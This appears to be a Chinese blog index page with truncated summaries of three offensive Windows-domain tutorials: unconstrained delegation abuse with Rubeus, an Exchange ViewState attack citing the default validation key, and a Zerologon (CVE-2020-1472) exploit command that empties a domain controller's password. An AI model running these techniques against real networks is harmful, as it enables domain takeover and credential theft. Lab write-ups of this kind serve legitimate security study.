摘要: 环境 域控:192.168.110.12 主机名:SYNC-DC 域内主机:192.168.1.101 主机名:mrhonest-pc 条件: + 获取到设置了非约束委派的主机system权限 利用方法 每秒监听来自域控主机(sync-dc$)的登录请求 现在是system权限 Rubeus.exe 阅读全文
posted @ 2021-01-21 10:08 mrhonest 阅读(478) 评论(0) 推荐(0) 编辑
摘要: 目标:mail.sync.net 1.需要四个参数,分别为: --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默认,漏洞产生原因) --validationalg = SHA1(默认,漏洞产生原因) --gener 阅读全文
posted @ 2021-01-21 09:55 mrhonest 阅读(398) 评论(0) 推荐(0) 编辑
摘要: 全程无图--因为是我编的 域控 : windows 2008 R2 192.168.1.105 mrhonest.com 第一步,将域控机器帐号密码设置为"空" python3 cve-2020-1472-exploit.py -n dc -t 192.168.1.105 第二步,使用"空"密码du 阅读全文
posted @ 2021-01-21 09:53 mrhonest 阅读(297) 评论(0) 推荐(0) 编辑